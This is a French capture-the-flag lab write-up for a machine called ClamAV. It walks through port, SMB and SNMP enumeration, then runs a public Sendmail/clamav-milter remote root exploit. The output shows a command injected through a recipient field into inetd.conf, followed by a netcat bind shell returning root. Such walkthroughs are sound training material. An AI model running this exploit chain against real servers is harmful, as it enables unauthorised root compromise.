# ClamAV `enumération` `smtp` `snmp` * Nom machine : ClamAV * Difficulté : Facile * OS : Linux ## Enumération ### NMAP ``` Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-18 11:34 EDT Nmap scan report for 192.168.233.42 Host is up (0.029s latency). Not shown: 65395 closed tcp ports (conn-refused), 133 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0) | ssh-hostkey: | 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA) |_ 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA) 25/tcp open smtp Sendmail 8.13.4/8.13.4/Debian-3sarge3 | smtp-commands: localhost.localdomain Hello [192.168.45.176], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP |_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP ". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 80/tcp open http Apache httpd 1.3.33 ((Debian GNU/Linux)) |_http-title: Ph33r |_http-server-header: Apache/1.3.33 (Debian GNU/Linux) | http-methods: |_ Potentially risky methods: TRACE 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 199/tcp open smux Linux SNMP multiplexer 445/tcp open netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP) 60000/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0) | ssh-hostkey: | 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA) |_ 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA) Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel Host script results: | smb-os-discovery: | OS: Unix (Samba 3.0.14a-Debian) | NetBIOS computer name: | Workgroup: WORKGROUP\x00 |_ System time: 2024-08-18T15:35:19-04:00 |_clock-skew: mean: 5h59m59s, deviation: 2h49m43s, median: 3h59m58s | smb-security-mode: | account_used: guest | authentication_level: share (dangerous) | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) |_nbstat: NetBIOS name: 0XBABE, NetBIOS user: , NetBIOS MAC: (unknown) ``` ### HTTP (80)
ifyoudontpwnmeuran00b
### SMB (139/445) ``` ┌──(kali㉿kali)-[~] └─$ smbmap -H 192.168.233.42 ________ ___ ___ _______ ___ ___ __ _______ /" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\ (: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :) \___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/ __/ \ |: \. |(| _ \ |: \. | // __' \ (| / /" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \ (_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______) ----------------------------------------------------------------------------- SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com https://github.com/ShawnDEvans/smbmap [*] Detected 1 hosts serving SMB [*] Established 1 SMB session(s) [+] IP: 192.168.233.42:445 Name: 192.168.233.42 Status: Authenticated Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers IPC$ NO ACCESS IPC Service (0xbabe server (Samba 3.0.14a-Debian) brave pig) ADMIN$ NO ACCESS IPC Service (0xbabe server (Samba 3.0.14a-Debian) brave pig) ``` ### Smux (199) : Linux SNMP multiplexer Le port 161:UDP est également ouvert ``` ┌──(kali㉿kali)-[~] └─$ snmpwalk -v 2c -c public 192.168.233.42 | grep STRING iso.3.6.1.2.1.1.1.0 = STRING: "Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686" iso.3.6.1.2.1.1.4.0 = STRING: "Root (configure /etc/snmp/snmpd.local.conf)" iso.3.6.1.2.1.1.5.0 = STRING: "0xbabe.local" iso.3.6.1.2.1.1.6.0 = STRING: "Unknown (configure /etc/snmp/snmpd.local.conf)" iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB module to describe generic objects for network interface sub-layers" iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB module for SNMPv2 entities" iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The MIB module for managing TCP implementations" iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for managing IP and ICMP implementations" iso.3.6.1.2.1.1.9.1.3.5 = STRING: "The MIB module for managing UDP implementations" iso.3.6.1.2.1.1.9.1.3.6 = STRING: "View-based Access Control Model for SNMP." iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The SNMP Management Architecture MIB." iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB for Message Processing and Dispatching." iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The management information definitions for the SNMP User-based Security Model." iso.3.6.1.2.1.2.2.1.2.1 = STRING: "lo" iso.3.6.1.2.1.2.2.1.2.2 = STRING: "eth0" iso.3.6.1.2.1.2.2.1.2.3 = STRING: "sit0" iso.3.6.1.2.1.2.2.1.6.2 = Hex-STRING: 00 50 56 9E 5F 5A iso.3.6.1.2.1.2.2.1.6.3 = Hex-STRING: 00 00 00 00 5F 5A iso.3.6.1.2.1.3.1.1.2.2.1.192.168.233.254 = Hex-STRING: 00 50 56 9E B9 D1 iso.3.6.1.2.1.4.22.1.2.2.192.168.233.254 = Hex-STRING: 00 50 56 9E B9 D1 iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E8 08 12 0F 32 38 00 2D 04 00 iso.3.6.1.2.1.25.1.4.0 = STRING: "root=/dev/sda1 ro Timeout: No Response from 192.168.233.42 iso.3.6.1.2.1.25.2.3.1.3.2 = STRING: "Real Memory" iso.3.6.1.2.1.25.2.3.1.3.3 = STRING: "Swap Space" iso.3.6.1.2.1.25.2.3.1.3.4 = STRING: "/" iso.3.6.1.2.1.25.2.3.1.3.5 = STRING: "/sys" ``` Nous avons un nom de domaine, nous l'ajoutons dans /etc/hosts puis cherchons des sous-domaines : sans résultat. ``` ┌──(kali㉿kali)-[~/oscp/clamav] └─$ snmp-check 192.168.233.42 snmp-check v1.9 - SNMP enumerator Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org) [+] Try to connect to 192.168.233.42:161 using SNMPv1 and community 'public' [*] System information: Host IP address : 192.168.233.42 Hostname : 0xbabe.local Description : Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686 Contact : Root (configure /etc/snmp/snmpd.local.conf) Location : Unknown (configure /etc/snmp/snmpd.local.conf) Uptime snmp : 01:10:10.80 Uptime system : 01:09:33.70 System date : 2024-8-18 16:42:30.0 {...} 3771 runnable klogd /sbin/klogd 3775 runnable clamd /usr/local/sbin/clamd 3778 runnable clamav-milter /usr/local/sbin/clamav-milter --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl 3791 runnable nmbd /usr/sbin/nmbd -D {...} ``` ### SMTP (25) Nous énumérons les users, et nous n'avons que root. en revanche la version de clamAV nous intéresse... Elle est vulnérable ! {% embed url="" %} ## Accès initial ``` ┌──(kali㉿kali)-[~/oscp/clamav] └─$ perl exploit.py 0xbabe.local Sendmail w/ clamav-milter Remote Root Exploit Copyright (C) 2007 Eliteboy Attacking 0xbabe.local... 220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Sun, 18 Aug 2024 16:33:38 -0400; (No UCE/UBE) logging access from: [192.168.45.176](FAIL)-[192.168.45.176] 250-localhost.localdomain Hello [192.168.45.176], pleased to meet you 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-EXPN 250-VERB 250-8BITMIME 250-SIZE 250-DSN 250-ETRN 250-DELIVERBY 250 HELP 250 2.1.0 <>... Sender ok 250 2.1.5 > /etc/inetd.conf">... Recipient ok 250 2.1.5 ... Recipient ok 354 Enter mail, end with "." on a line by itself 250 2.0.0 47IKXc5Q004630 Message accepted for delivery 221 2.0.0 localhost.localdomain closing connection ``` L'exploit fonctionne ! Nous n'avons plus qu'à nous connecter au port que nous venons d'ouvrir... ``` ┌──(kali㉿kali)-[~] └─$ nc 192.168.233.42 31337 whoami root ``` Nous sommes root !